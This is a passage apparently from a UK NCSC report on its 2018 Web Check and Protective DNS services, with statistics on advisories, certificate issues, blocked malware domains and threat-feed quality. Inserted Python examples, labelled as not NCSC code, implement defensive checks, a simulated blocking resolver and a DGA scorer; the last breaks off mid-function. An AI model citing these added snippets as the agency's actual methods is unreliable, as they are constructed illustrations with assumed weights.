Web Check’s ‘advisories’ are presented to the user as a narrative on their website’s security, including ways to improve. Each ‘advisory’ groups together a number of ‘issues’. In Table 15, we present the number of advisories issued, alongside the number of unique URLs scanned and the number of individual checks on websites. Advisories presented to users have different levels of severity, from ‘informational’, through ‘advisory’ to the most serious, ‘urgent’ [16]. For some specific areas, we also issue ‘positive’ advisories, meaning that whatever has been tested is well-configured and meets our standards. This is the result of some early user research that showed us that just shouting at people when they get things wrong isn’t helpful. Knowing you’re doing a decent job - and sometimes being able to tell your boss that - builds confidence so that you’re more likely to act sensibly when something does need attention.

Measure                                     2017        2018
Unique URLs scanned                         7,791       30,813
Individual checks run                       7,181,464   633,991,247
Total advisories issued                     29,496      111,853
‘Advisory’ and ‘urgent’ advisories issued   4,108       43,510

Table 15: Web Check comparison in numbers - 2017 and 2018

The total number of unique URLs scanned in 2018 has more than tripled in comparison to 2017. Given each URL is added by a user, this shows the growth of the user base of Web Check. The number of individual checks run has increased almost a hundredfold, and we issued a total of 111,853 advisories direct to users in 2018.

5.2 What does Web Check look for?

For reference, we reproduce Web Check’s capabilities from last year’s paper here, and detail the additional checks added in 2018: ASP.NET, Consistency, Cross-Origin, XML-RPC and a new DNS check.

• CMS

– Attempts to determine if a content management system is being used to serve the website and checks its version.

– Supports Drupal, Jadu, Joomla, Umbraco, and WordPress.

– Reports whether the CMS is no longer supported, supported but not on the current major version, or on the current major but not minor version.

[16] Yes, ‘advisory advisory’ is a poor name, but it’s too late now.


– Fetches the URL, parses as HTML, and checks a small number of well-known paths if necessary.

• Domain

– Checks whether the URL contains a domain reserved for use by the public sector (e.g. foo.gov.uk, foo.ac.uk, not foo.co.uk, foo.com).

– Checks for ‘dangling DNS’ scenarios.

– Only uses DNS.

• HTTP

– Checks whether the website redirects from a reserved domain to a public domain (e.g. foo.gov.uk to foo.com).

– Checks whether the website redirects from HTTPS to HTTP.

– Checks whether the website returns a valid HTTP status code.

– Checks for HTTP/2 support.

– Makes a small number of HTTP requests.

• Server Version

– Attempts to determine the server software being used to serve the website and checks its version.

– Supports Apache, Nginx, PHP and OpenSSL.

– Reports whether the server is no longer supported.

– Fetches the URL and inspects the ‘Server’ and ‘X-Powered-By’ headers.

• TLS

– Checks whether SSL/TLS is supported and performs a full SSL/TLS vulnerability assessment.

– Supports SSLv2, SSLv3, TLSv1.0, TLSv1.1, TLSv1.2, TLSv1.3.

– Identifies all known SSL/TLS vulnerabilities that we can test for non-intrusively.

– Connects to the host over SSL/TLS a medium number of times to assess vulnerabilities (around 30).

• X.509

– Checks the website’s certificate chains for issues (including expiry).

– Checks all certificate chains for issues, such as too many or too few certificates being sent by the server, whether the domain matches etc.

– Checks for any certificates blacklisted by browsers (e.g. Symantec, DigiNotar).

– Connects to the host over TLS three times to fetch each certificate type.

• WannaCry

– Checks for artefacts of the WannaCry infection in the server.

– Checks whether ports 137, 138, 139, 445, or 3389 are open for TCP or UDP.


• Third Party

– Checks for third party resources being used in the application (such as externally loaded javascript) which are loaded over HTTP.

• ASP.NET

– Checks for ASP.NET applications with remote debugging or tracing enabled.

• Consistency

– Checks the site serves the same content over HTTP and HTTPS.

– Checks for redirection to different pages over HTTP and HTTPS.

• Cross-Origin

– Checks for overly-permissive cross-origin policies.

• XML-RPC

– Checks for unsecured XML Remote Procedure Call functionality in content management systems.
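As an added example of how checks of this kind can be written (this is not Web Check’s own code), the block below runs Domain, HTTP, Server Version, Cross-Origin and Consistency style checks over a captured response, so it works offline. It assumes a reduced reserved-domain list (just the page’s two examples), treats 2xx/3xx as a valid final status, and takes the set of unsupported server versions from the caller; the sample response is constructed.

```python
"""Web Check-style checks over captured HTTP responses.

Added example, not Web Check's code. Each check is a pure function over an
already-fetched response so the logic can be exercised without network access.
Assumptions: RESERVED_SUFFIXES is reduced to the page's two examples, a valid
final status is 2xx/3xx, and `unsupported` (product, major.minor) pairs come
from the caller's own lifecycle data.
"""
import hashlib
import re
from dataclasses import dataclass, field
from urllib.parse import urlparse

RESERVED_SUFFIXES = (".gov.uk", ".ac.uk")   # assumption: reduced list
VERSION_RE = re.compile(r"([A-Za-z][\w.-]*)/(\d[\w.]*)")


@dataclass
class Response:
    """What a fetch produced: final URL, status, headers (lower-cased names), body."""
    url: str
    status: int
    headers: dict
    body: str = ""
    redirect_chain: list = field(default_factory=list)


def is_reserved(host):
    host = (host or "").lower()
    return any(host == s[1:] or host.endswith(s) for s in RESERVED_SUFFIXES)


def check_domain(start_url, resp):
    """Domain and HTTP checks: reserved name, redirect target, scheme downgrade, status."""
    findings = []
    start, final = urlparse(start_url), urlparse(resp.url)
    if not is_reserved(start.hostname):
        findings.append(("Domain", "informational", "not a reserved public-sector domain"))
    elif not is_reserved(final.hostname):
        findings.append(("HTTP", "advisory", f"redirects from reserved domain to {final.hostname}"))
    if start.scheme == "https" and final.scheme == "http":
        findings.append(("HTTP", "urgent", "redirects from HTTPS to HTTP"))
    if not 200 <= resp.status < 400:
        findings.append(("HTTP", "advisory", f"final status code {resp.status}"))
    return findings


def check_server_version(resp, unsupported=frozenset()):
    """Server Version check: product/version pairs disclosed in Server and X-Powered-By."""
    findings = []
    for h in ("server", "x-powered-by"):
        for product, version in VERSION_RE.findall(resp.headers.get(h, "")):
            key = (product.lower(), ".".join(version.split(".")[:2]))
            if key in unsupported:
                findings.append(("Server Version", "urgent", f"{product} {version} is no longer supported"))
            else:
                findings.append(("Server Version", "informational", f"{product} {version} disclosed in {h}"))
    return findings


def check_cross_origin(resp):
    """Cross-Origin check: flag a wildcard or 'null' Access-Control-Allow-Origin."""
    acao = resp.headers.get("access-control-allow-origin", "").strip()
    if acao in ("*", "null"):
        return [("Cross-Origin", "advisory", f"permissive Access-Control-Allow-Origin: {acao}")]
    return []


def check_consistency(http_resp, https_resp):
    """Consistency check: same final page and same content over HTTP and HTTPS."""
    def digest(r):
        return hashlib.sha256(r.body.encode()).hexdigest()
    findings = []
    if urlparse(http_resp.url).path != urlparse(https_resp.url).path:
        findings.append(("Consistency", "advisory", "HTTP and HTTPS end up on different pages"))
    if digest(http_resp) != digest(https_resp):
        findings.append(("Consistency", "advisory", "different content over HTTP and HTTPS"))
    return findings


def run_all(start_url, resp, unsupported=frozenset()):
    return (check_domain(start_url, resp)
            + check_server_version(resp, unsupported)
            + check_cross_origin(resp))


# Constructed sample: a reserved-domain site that bounces to a .com host over plain HTTP.
SAMPLE_START = "https://foo.gov.uk/"
SAMPLE = Response(
    url="http://foo.com/home", status=200,
    headers={"server": "Apache/2.2.15 (CentOS)", "x-powered-by": "PHP/5.4.16",
             "access-control-allow-origin": "*"},
    body="<html><body>hello</body></html>",
    redirect_chain=["https://foo.gov.uk/"],
)

if __name__ == "__main__":
    for finding in run_all(SAMPLE_START, SAMPLE, unsupported={("apache", "2.2")}):
        print(finding)
```

Each finding carries the check name and a severity from the page’s own scale (informational, advisory, urgent), so grouping them into a single advisory per check, as Web Check does, is a matter of bucketing on the first element.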

Table 16 shows the urgent and advisory advisories from 2017 and 2018. These are the most serious security issues which we encourage users to fix.

Type             2017            2018
TLS              1,629           18,496
X.509            2,178           11,179
Consistency      New for 2018    4,994
Server Version   76              3,216
CMS              184             2,148
XML-RPC          New for 2018    1,729
ASP.NET          New for 2018    612
Cross-Origin     New for 2018    549
3rd Party        New for 2018    476
WannaCry         36              104
Domain           0               6
HTTP             1               1
WordPress        4               0 - merged with CMS plugin
Total            4,108           43,510

Table 16: Web Check advisories - 2017 and 2018

The new-for-2018 plugins produced a total of 8,360 urgent and advisory advisories, compared to 35,150 urgent and advisory advisories produced from plugins created in 2017. There is clearly still value in the older plugins since they are still issuing urgent and advisory findings, indicating that security of internet-facing properties is a continuous job and one cannot just deploy and forget. Who knew? [17]

In 2018, the biggest absolute increases as seen in Table 16 are the TLS scans, the X.509 scans and the Server Versions. By percentage increase, it’s Server Version, CMS and then TLS. In section 5.4 we discuss a trend that we observe in X.509 certificates. As we get more and more consistent data in other areas, we will be able to gain more insight into the trends in the other vulnerabilities and be able to target them more effectively.

[17] For non-UK readers, this is sarcasm.

5.3 Getting issues fixed

5.3.1 Time to fix

One advisory issued to a user is often made up of multiple issues discovered when the plugins scan a website. For example, there could be multiple TLS configuration issues grouped together into a single TLS configuration advisory, and only by fixing each one of these individual issues will the advisory resolve. So, it’s actually more interesting to look at how many individual issues are fixed, rather than just advisories.

The time to fix individual issues which are grouped into ‘urgent’ and ‘advisory’ advisories in 2018 is presented in Figure 24.

[Figure 24 plot: x axis ‘Time to fix (days)’ (1 to 250); y axis ‘Number of urgent and advisory issues’ (0 to 80,000)]

Figure 24: Histogram of time to fix urgent and advisory issues (250 bins, xmax = 365)

Figure 24 shows that the issues reported by Web Check can take anywhere from a day to resolve, to a month or even longer. We are mostly interested in the long-running issues and understanding any blockers to remediation that the site owners may face. We will be concentrating on this, and how to improve time to fix, in 2019.

5.3.2 How bad is it all?

[Figure 25 plot: x axis ‘Month (2018)’ Jan to Dec; y axis ‘Number of issues’ (0 to 40,000); series ‘Urgent’, ‘Advisory’ and ‘Informational’]

Figure 25: Number of issues fixed in 2018, grouped by severity

Figure 25 shows the number of issues fixed over the year, split by severity. This shows the number of issues fixed has risen throughout 2018, driven by a constant onboarding of new users and new tests created by the team. The spike in June was not the result of a zero day being discovered, but due to a false positive in one of the Web Check modules that made it erroneously appear as if a set of issues had been fixed. This was remediated quickly, but we didn’t massage the data to remove the evidence. It doesn’t affect the rest of the data across the year; remember this is issues that have been fixed, not discovered.

5.4 Case study: X.509 certificates

The X.509 test looks at a website’s certificates and checks for validity in a number of ways. The advisory which is issued to the user is one which can be positive as well as negative, meaning that we can measure both ‘good’ certificate usage as well as ‘bad’. Figure 26 shows the number of X.509 advisories issued in 2018, grouped by severity.

We would expect the total number of advisories given to rise in proportion to the number of URLs scanned since we would expect almost all URLs to have a certificate, as we see in figure 26. We also see that the number of negative (‘urgent’ and ‘advisory’) advisories is relatively flat, while the number of ‘positive’ advisories is increasing, showing that the number of ‘bad’ certificate configurations is lower than expected. This implies that, over time, users of Web Check maintain their certificate configurations relatively well. Given there is no obvious other common factor across this population, this appears to be a direct effect of using Web Check.

[Figure 26 plot: x axis ‘Month (2018)’ Jan to Dec; y axis ‘Number of issues’ (0 to 500,000); series ‘Positive’ and ‘Urgent or Advisory’]

Figure 26: Number of X.509-related advisories issued in 2018

5.5 Third party resources

In February 2018, the popular web accessibility extension BrowseAloud was compromised by criminals and modified to add cryptomining code. This meant that any website which included the BrowseAloud extension as a resource included the criminals’ modified version from that point onwards and so visitors to those websites ran the criminals’ code without prompting or notification because the site they were visiting imported BrowseAloud as a trusted resource. This means that all visitors to those sites were cryptomining on behalf of the criminals that compromised the BrowseAloud resource. The BrowseAloud extension was very widely used, including on a number of UK public sector websites.

We live in a world where component reuse and third party integration is very common and helps people build more functional and usable websites more quickly and this isn’t a bad thing, in general. However, we are effectively trusting a bunch of third parties with our reputation in doing so. So, it’s probably a good idea to understand who these third parties are, and whether they deserve our trust. We have Web Check crawling data to help us with this.

In Table 17 we show the scale of third party resources used across the sites scanned by Web Check. This is currently imperfect as Web Check only processes HTML and does not execute any JavaScript as part of a site, so we may be missing some resources loaded by JavaScript. Given this appears to be interesting data, we’ll try to fix that in the next year. We also have a slightly gross definition of ‘third party’ today - namely that the resource is not hosted on a *.gov.uk domain. That probably needs refining as well.

Scale               Resource Type      Number of sites
10 or more sites    All Resources      406
                    Active Resources   314
100 or more sites   All Resources      32
                    Active Resources   31

Table 17: Scale of third party resources used in Web Check-scanned sites

From this, we can see that there are a relatively small number of resources that are widely used across public sector sites. We will be looking into the character of these common resources and determining whether there is anything we can do to monitor their integrity and proactively inform Web Check users if the third party resources they import change. Incidentally, BrowseAloud is still used on 148 sites scanned by Web Check.
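An added example (not Web Check’s code) that covers the ‘Third Party’ check from section 5.2, the Table 17 scale counts and the integrity monitoring question above: it inventories third-party resources across a handful of constructed pages using the page’s own *.gov.uk definition, flags resources loaded over HTTP, and keeps a Subresource Integrity digest baseline so a modified resource shows up as a change. Treating script and iframe resources as ‘active’ is an assumption of the example, as are the site names and resource bodies.

```python
"""Third-party resource inventory and integrity baselining across scanned sites.

Added example, not Web Check's code. It extracts the resources each page
references, applies the page's working definition of 'third party' (not hosted
on a *.gov.uk domain), flags any loaded over plain HTTP, counts how many sites
share each resource, and keeps a Subresource Integrity (sha384) baseline so a
changed resource can be detected. ACTIVE_TAGS is an assumption of the example.
"""
import base64
import hashlib
import re
from collections import defaultdict
from urllib.parse import urlparse

# Constructed sample pages for four hypothetical public-sector sites.
SITES = {
    "https://alpha.gov.uk/": '<script src="https://cdn.third.example/ba/script.js"></script>'
                             '<img src="http://static.third.example/logo.png">',
    "https://beta.gov.uk/":  '<script src="https://cdn.third.example/ba/script.js"></script>'
                             '<link rel="stylesheet" href="https://beta.gov.uk/site.css">',
    "https://gamma.gov.uk/": '<iframe src="https://maps.third.example/embed"></iframe>'
                             '<script src="https://cdn.third.example/ba/script.js"></script>',
    "https://delta.gov.uk/": '<script src="/local.js"></script>',
}

TAG_RE = re.compile(r'<(script|iframe|img|link)\b[^>]*?\b(?:src|href)="([^"]+)"', re.I)
ACTIVE_TAGS = {"script", "iframe"}   # assumption: what counts as an 'active' resource


def extract_resources(html):
    """[(tag, url)] for every absolute URL referenced from the tags above.
    Like Web Check, this parses HTML only, so resources added by JavaScript are missed."""
    return [(tag.lower(), url) for tag, url in TAG_RE.findall(html) if "://" in url]


def is_third_party(url):
    host = (urlparse(url).hostname or "").lower()
    return not (host == "gov.uk" or host.endswith(".gov.uk"))


def inventory(sites):
    """Per third-party resource: the sites using it and the tags it was loaded with,
    plus every (site, url) where a third-party resource is fetched over plain HTTP."""
    inv = defaultdict(lambda: {"sites": set(), "tags": set()})
    over_http = []
    for site, html in sites.items():
        for tag, url in extract_resources(html):
            if not is_third_party(url):
                continue
            inv[url]["sites"].add(site)
            inv[url]["tags"].add(tag)
            if urlparse(url).scheme == "http":
                over_http.append((site, url))
    return dict(inv), over_http


def widely_used(inv, min_sites, active_only=False):
    """Resources present on at least `min_sites` sites (the Table 17 scale bands)."""
    return sorted(url for url, info in inv.items()
                  if len(info["sites"]) >= min_sites
                  and (not active_only or info["tags"] & ACTIVE_TAGS))


def sri_digest(content: bytes):
    """Subresource Integrity value ('sha384-' + base64 digest) for a resource body."""
    return "sha384-" + base64.b64encode(hashlib.sha384(content).digest()).decode()


def detect_changes(baseline, fetched):
    """URLs whose freshly fetched body no longer matches the stored SRI digest."""
    return sorted(url for url, body in fetched.items()
                  if url in baseline and sri_digest(body) != baseline[url])


if __name__ == "__main__":
    inv, over_http = inventory(SITES)
    print("used on 2+ sites:", widely_used(inv, 2))
    print("loaded over HTTP:", over_http)
```

The digest is in the format browsers accept in an `integrity` attribute, so the same baseline that drives a change alert can also be handed to site owners who want the browser itself to refuse a modified script.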

5.6 Case study: Symantec certificates

In October, Symantec and their subsidiaries like Thawte, VeriSign, Equifax, GeoTrust, and RapidSSL had their certificates marked as untrusted by Google. According to Google, Symantec had been issuing certificates without the proper due diligence, and it became clear that Symantec certificates were of limited value as this change in trust became prevalent. They’d given several organisations the ability to issue certificates ‘without the appropriate or necessary oversight, and had been aware of security deficiencies at these organizations for some time.’ [18]

The release of Chrome 70 on October 18th marked a complete removal of trust in Symantec’s PKI infrastructure. This meant that if you visited a website with a Symantec or associated certificate, the website would show a security warning page instead of the actual site.

In order to try to minimize the impact on public sector sites, we wanted Web Check users to have advance warning, as obtaining new certificates can, rightly, be a somewhat arduous task. One of our security researchers, Jamie, authored a blog describing the issue and pointing public sector organisations to Web Check. We also issued a Web Check warning for those users who had affected certificates, a month or so before they were due to be untrusted. Figure 27 shows the population of Symantec and associated certificates across public sector over the period just before Google’s ‘untrusting’ of them.

The rate of removal of these deprecated certificates is broadly similar across both populations. The population of sites using deprecated certificates at the time is dominated by Web Check users, which makes drawing useful conclusions difficult. However, it does appear that for an issue as public and serious as this one, all site owners respond broadly similarly whether they use Web Check or not. This sort of issue is likely to happen again, whether related to certificates or not, and so it is good that we’ve proved that we can deploy new checks quickly and drive the right behaviour in our user population quickly.

5.7 Conclusion

Web Check’s user base continued to grow in 2018, allowing us to reach more organisations and help them ensure the basic security of their websites is maintained. We’ve seen that the new checks introduced in 2018 are producing new insights for users whilst the checks introduced in 2017 continue to produce advisories requiring action. The data here shows that simple things done at scale can have a positive effect and that, at least for public sector sites, continuous nudging is needed to maintain the security of those sites.

[18] https://security.googleblog.com/2017/09/chromes-plan-to-distrust-symantec.html

[Figure 27 plot: x axis ‘Date (2018)’ 01-Sep to 10-Dec; y axis ‘Number of affected certificates’ (0 to 400); series ‘Web Check Users’ and ‘All Public Sector’]

Figure 27: Number of affected certificates


6 Protective DNS

The Domain Name Service is the phonebook of the internet, translating human readable names into machine-usable IP addresses. A fuller description of this system was provided in last year’s report and won’t be repeated here. DNS is used for a variety of things on the internet, not just looking up addresses. For example, DMARC and related policies for a domain are published as DNS records. In this section, we are looking only at records that resolve to IP addresses, perhaps as part of a user browsing the internet or malware trying to contact its command and control servers.

The Protective DNS (PDNS) service intends to be the recursive resolver of choice for public sector organisations, instead of their ISP or managed service provider. The service brings in feeds of threat intelligence, including from the NCSC, and uses those plus analytics to help stop those organisations that are using the service from accessing known malicious addresses. Here ‘malicious’ means doing something objectively bad that the user doesn’t intend - malware connections, credential stealing and so on. This service does not block access based on taste or corporate policy, so users need to block porn, gambling and other classes of inappropriate content in their own infrastructure. The PDNS service is limited to cyber security related badness.

6.1 DNS and numbers

DNS resolutions can be a bit weird. Recall that DNS is effectively implemented as a hierarchy, with each level in the hierarchy performing caching of resolution data, according to the ‘time to live’ on the returned results. On the PDNS service, when we return a block or redirect for a domain, we set a low time to live - normally a few minutes - on the record. This is so that any false positives can be rolled back quickly. Now, the enterprises that use the PDNS resolver will have their own corporate resolver which is the local cache for their clients. This has the effect of ‘smoothing’ the queries coming from any customer networks, with a single request to the PDNS resolver potentially representing more than one request from inside the customer network. We also know that certain security software will make queries to malicious domains. In some cases, this is a result of heuristic conviction of behaviour on a machine, sometimes it’s unrelated. These behaviours are proprietary and specific to individual security software. We do not believe that this behaviour dominates the queries to the PDNS service. When taken together, these two behaviours likely broadly cancel each other out. While the detection numbers here are likely broadly representative of real customer issues, the precise numbers should be used carefully. It is worth noting that blocking characteristics and what the numbers mean will differ between DNS implementations and architectures. Comparisons should not be done naively.

6.2 Last year in protective DNS

By the end of 2018, the service was protecting an estimated 1.4 million employees across the UK public sector. In total across 2018, the service answered 68.7 billion queries with the peak query rate being 27,109 queries per second, seen in November. The peak queries received per month, in queries per second, is shown in figure 28. As expected, this grows as more organisations are onboarded to the service.

Of those 68.7 billion queries, we blocked access to 57.4 million for 118,527 unique reasons. There were 2416 unique customers (by source IP) that made a query that we blocked. Each unique customer IP could represent a small organisation, or the entire public sector in a geographic area using a common transport network. The point to take from this is that the majority of our customers have had detections when using the PDNS service, rather than worry about the precise number of customer IPs.
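The caching and counting mechanics described in 6.1 and 6.2 are shown in the following added example (a simulation, not the PDNS service’s code): a resolver that blocks names found in a threat-intelligence list, including subdomains of listed names, answers blocks with a short TTL, and sits behind per-customer caching resolvers that collapse repeat queries within the TTL. It then computes the same kind of counts as above: queries blocked, unique block reasons and unique customer IPs with a block. The block list, TTL values, sinkhole address and query log are all constructed.

```python
"""Protective-DNS style policy resolver with customer-side caching, simulated.

Added example, not the PDNS service's code. It models the behaviour described
in 6.1 and 6.2: a block list matched against a name and its parents, block
answers with a short TTL so false positives age out quickly, and an enterprise
cache in front of the resolver that 'smooths' repeat queries. All data below is
constructed.
"""

BLOCK_TTL = 300          # seconds; assumption standing in for 'a few minutes'
NORMAL_TTL = 3600        # assumption for answers that are not blocked
SINKHOLE = "192.0.2.1"   # RFC 5737 documentation address used as the block answer

# Constructed block list: name -> reason (threat category / indicator label).
BLOCKLIST = {
    "c2.bad.example": "botnet-c2/example-1",
    "dga-seed.example": "dga/example-family",
}


def blocked_reason(qname):
    """Return the block reason if qname or any parent domain of it is listed."""
    labels = qname.rstrip(".").lower().split(".")
    for i in range(len(labels)):
        reason = BLOCKLIST.get(".".join(labels[i:]))
        if reason:
            return reason
    return None


class ProtectiveResolver:
    """The upstream policy resolver: logs every query it actually receives."""
    def __init__(self):
        self.log = []   # (client_ip, qname, blocked, reason)

    def resolve(self, client_ip, qname):
        reason = blocked_reason(qname)
        if reason:
            self.log.append((client_ip, qname, True, reason))
            return SINKHOLE, BLOCK_TTL
        self.log.append((client_ip, qname, False, None))
        return "203.0.113.10", NORMAL_TTL   # constructed 'upstream' answer


class CustomerCache:
    """The enterprise's own recursive resolver: caches answers per TTL, so the
    upstream resolver sees at most one query per name per TTL window."""
    def __init__(self, egress_ip, upstream):
        self.egress_ip, self.upstream, self.cache = egress_ip, upstream, {}

    def query(self, now, qname):
        hit = self.cache.get(qname)
        if hit and hit[1] > now:          # (answer, expiry) still valid
            return hit[0]
        answer, ttl = self.upstream.resolve(self.egress_ip, qname)
        self.cache[qname] = (answer, now + ttl)
        return answer


def summarise(log):
    """The 6.2-style counts over what the upstream resolver saw."""
    blocked = [e for e in log if e[2]]
    return {
        "queries": len(log),
        "blocked": len(blocked),
        "unique_reasons": len({e[3] for e in blocked}),
        "customers_with_blocks": len({e[0] for e in blocked}),
    }


# Constructed query log: (time_s, customer_egress_ip, qname)
QUERY_LOG = [
    (0,   "198.51.100.1", "www.example.gov.uk"),
    (5,   "198.51.100.1", "c2.bad.example"),
    (60,  "198.51.100.1", "c2.bad.example"),        # inside TTL: served from the customer cache
    (400, "198.51.100.1", "c2.bad.example"),        # TTL expired: reaches the resolver again
    (10,  "198.51.100.2", "host.dga-seed.example"), # blocked via parent-domain match
    (20,  "198.51.100.3", "www.example.gov.uk"),
]


def run(query_log):
    """Replay the log in time order through per-customer caches; return the counts
    plus how many client queries were issued in total."""
    pdns = ProtectiveResolver()
    caches = {}
    for t, ip, name in sorted(query_log):
        caches.setdefault(ip, CustomerCache(ip, pdns)).query(t, name)
    stats = summarise(pdns.log)
    stats["client_queries"] = len(query_log)
    return stats


if __name__ == "__main__":
    print(run(QUERY_LOG))
```

On the constructed log six client queries become five resolver queries, because the repeat lookup at 60 s is absorbed by the customer’s cache while the one at 400 s is not; that gap between client and resolver counts is the smoothing effect 6.1 warns about when reading the block numbers.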

[Figure 28 plot: x axis months Jan to Dec; y axis ‘Peak queries’ (10,000 to 25,000)]

Figure 28: Peak queries per second in 2018

Of those blocks, 28 million of them were for domain generation algorithms (DGAs), including 15 known DGAs. They included Ramnit, Suppobox, TinyBanker, Matsnu, Bedep, Fobber and Conficker [19].

We also blocked 13,800 queries for at least 20 named botnet command and control systems, including Betabot, Graybird, Katrina, Lokibot, StealRat and Godzilla. There were also a number of exploit kit related indicators blocked. This included 796,000 queries for 16 unique indicators of exploit kits including Magnitude, RIG, SweetOrange and Neutrino.

Ransomware continues to be an issue globally. In 2018, the PDNS service blocked over 450,000 WannaCry related queries from 15 different PDNS customers and over 230,000 queries related to the BadRabbit ransomware.

It’s not all about blocking stuff though. The intent for the service is both to protect systems directly and to help owners of systems get to the bottom of their problems and fix them. Our service users are helping us understand what would be useful to them in terms of dashboards and other information. Based on this, we should be releasing a new version of the customer portal in early 2019. We’ll detail some of that in the next report.

Overall, in 2018, we’ve seen a twelve-fold increase in terms of customers active on the service, where ‘active’ means they are actively sending queries, and a nearly five-fold increase in traffic.

In the last report, the service was relatively new and so we only published the last couple of months of block data. Noting it’s a little bit weird, but to try to account for usage volumes based on the time of year, Table 18 shows the volume of customers and blocks in the last two months of 2017 and 2018.

We can see that, even though we had an order of magnitude more active customers at the end of 2018, we blocked about half as many unique domains. It’s difficult to draw concrete conclusions from this, but given the other data we expose here, it’s likely that we’re having the underlying effect of making networks more secure, at least in a decent proportion of our customers. There’s significantly more analytic work to be done here, though.

[19] Yes, Conficker. The same one from 2008. It’s still active somewhere in public sector.

                                               2017      2018
Number of active accounts                        21       253
Number of unique blocks
(last two months of year only)               42,053    27,462

Table 18: Comparison of unique blocks for the last two months of 2017 and 2018

An active account is one which is fully onboarded onto the PDNS service and is actively sending queries via the DNS. Moving all your systems to use a new DNS service is not trivial, and so it’s testament to our customers that more than 250 of them have now done so and are being actively protected.

Table 19 shows the progression of customer adoption over 2018, along with the number of unique blocks over the same period. A unique block is a unique domain name that is blocked, each one counted only once per period. Figure 29 shows the unique blocks graphically and figure 30 shows the unique blocks per month normalised by the number of active customers at the end of that month. That’s a particularly kludgy normalisation for two reasons. Firstly, customers come in very different flavours. There’s a big difference in the effect on the number of blocks from a small local authority versus a large central government department. We minimise the bias this can introduce by using the unique blocks measure rather than raw query volume, which is effectively an indicator of the existence of something that needs investigation. Secondly, customers are onboarded across the month as they are ready, so we’re effectively amortising each customer’s initial detections across all the customers onboarded that month. We’re ignoring that effect as it’s likely to be small.

Month (2018)    Active account count    Unique blocks
January                 137                16,728
February                146                 1,543
March                   159                 4,061
April                   175                 6,823
May                     185                 7,009
June                    196                 3,907
July                    202                10,094
August                  216                21,119
September               227                19,182
October                 224                14,146
November                246                14,193
December                253                13,269

Table 19: Number of customers and unique blocks by the DNS service over 2018

Figure 29: Number of unique blocks (line chart; x-axis Month (2018), January to December; y-axis number of unique blocks, 5,000 to 20,000)

Figure 30: Number of unique blocks, normalised by number of active organisations (line chart; x-axis Month (2018), January to December; y-axis number of unique blocks per active organisation, 20 to 120)

6.3 Infrastructure

It’s obvious that people are going to attack our PDNS infrastructure. Our resolver fleet is in an anycast configuration, so the load is distributed across the physical bits of tin we have running the service. However, that doesn’t mean we’re immune from attack, and all our customers have secondary resolvers configured for resiliency should the worst happen. In December, the service was subject to five different DDoS attacks with a peak load of about 12.5 Gbps. We had both short, bursty attacks that lasted a few minutes and more attritional attacks. So far, we’ve maintained 100% service availability, but this shows the need to both build resilient infrastructure and have secondary resolvers configured, even if they lack the cyber security protection we build into the main service.

6.4 Feeds

The effectiveness of the PDNS service relies on the quality of the data we use to block malicious domains. As described last year, we did a bake-off[20] of multiple feeds and procured ones that seemed to have minimal overlap and reasonably high quality. As of the end of 2018, we have five threat feeds going into PDNS. Table 20 shows the effect each feed had in December 2018.

          Unique blocks    False positives    Proportion of feed used
Feed 1         1,225              2                    4%
Feed 2         9,960              0                   81%
Feed 3         6,321              0                   87%
Feed 4         1,170              0                  2.4%
Feed 5             9              0                   99%

Table 20: Effect of each threat feed in December 2018

By observation we can see that the number of validated false positives is very low, at only two for the month. It is also trivial to observe that feeds 1 and 4 are very underutilised, with only a small percentage of the provided data actually used. Feed 4 contains a large proportion of domains related to the sending of spam, which are of little use to the PDNS service and so are not used, but the remaining data in this feed is useful. Feed 1 turns out to be low quality and we cannot trust the accuracy of the vast majority of the domains marked as malicious in this feed. The small percentage of the data we do use is that of the absolute highest confidence from the vendor. At the end of 2018, we were in the process of running a procurement for an alternative vendor as this feed is not of sufficient quality to drive the service. This does show that threat intelligence feeds, even from reputable vendors, are often of variable quality in actual use and have specific biases in terms of the type and quality of the data provided.

Part of the unique value the NCSC can provide is our own high quality, low volume threat feed, concentrating on the most serious threats we see. We are trialling this with the PDNS service in advance of wider sharing. In the period September to December 2018, 2,783 malicious domains were added to the PDNS block list directly by the NCSC.

Users of any threat intelligence feed (including an NCSC one) should invest the effort necessary to understand the real characteristics of the data in the feed, and the confidence that should be applied to each class of indicator.

False positives and overblocking are a real concern with any blocking system, DNS or otherwise. In 2018 there were 62 false positives, 37 of which were proactively identified by the PDNS ingest process run by Nominet before they became customer impacting. However, due to our constant review and optimisation of our processes, only 6 of these occurred in the last half of 2018.

As well as blocking based on feeds, we continue to implement heuristics in scoring malicious domains and this remains an area of active research. In order to guarantee service in the face of an undetected false positive, we have undertaken several iterations of dynamic whitelisting to ensure connectivity to common and business critical services.

[20] For non-UK readers, an informal competition to select something based on a limited set of criteria.
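The two ideas in the paragraphs above, heuristic scoring of domain names and a whitelist that is consulted before any block, fit together as in the following added example. It is illustrative code and not the NCSC’s heuristics, which the report does not describe: the lexical features, point weights, threshold, allowlist entries and sample names are all assumptions. The point it makes is that crude lexical features catch the random-looking labels a DGA produces but also fire on some perfectly ordinary names, so the allowlist, not the score, has the final say for critical services.

```python
"""Illustrative lexical scoring of domain names, of the kind a protective
resolver might run alongside its threat feeds, with an allowlist consulted
before any block decision so that an undetected false positive cannot cut off
a business critical service.

Added example, not the NCSC's heuristics (which the report does not describe).
The features, point weights, threshold, allowlist and sample names are assumptions.
"""
import math
from collections import Counter

# Constructed allowlist standing in for 'common and business critical services'.
ALLOWLIST = {"update.microsoft.com", "login.microsoftonline.com", "gov.uk"}
THRESHOLD = 6  # assumed: a score at or above this is blocked


def shannon_entropy(s: str) -> float:
    """Bits per character; random-looking DGA labels score high."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def registrable_label(fqdn: str) -> str:
    """Second-level label, e.g. 'xk3v9qw2pzt7' for 'xk3v9qw2pzt7.example'.
    Assumption: no public-suffix handling, so 'x.co.uk' would yield 'co'."""
    parts = fqdn.lower().rstrip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def longest_consonant_run(label: str) -> int:
    best = run = 0
    for ch in label:
        if ch.isalpha() and ch not in "aeiou":
            run += 1
            best = max(best, run)
        else:
            run = 0
    return best


def dga_score(fqdn: str) -> int:
    """Integer score 0..12 from four crude lexical features (assumed weights)."""
    label = registrable_label(fqdn)
    if len(label) < 6:
        return 0
    points = 0
    if shannon_entropy(label) > 3.0:
        points += 4
    if sum(ch.isdigit() for ch in label) / len(label) > 0.25:
        points += 3
    if longest_consonant_run(label) >= 4:
        points += 3
    if len(label) >= 12:
        points += 2
    return points


def is_allowlisted(fqdn: str, allowlist=ALLOWLIST) -> bool:
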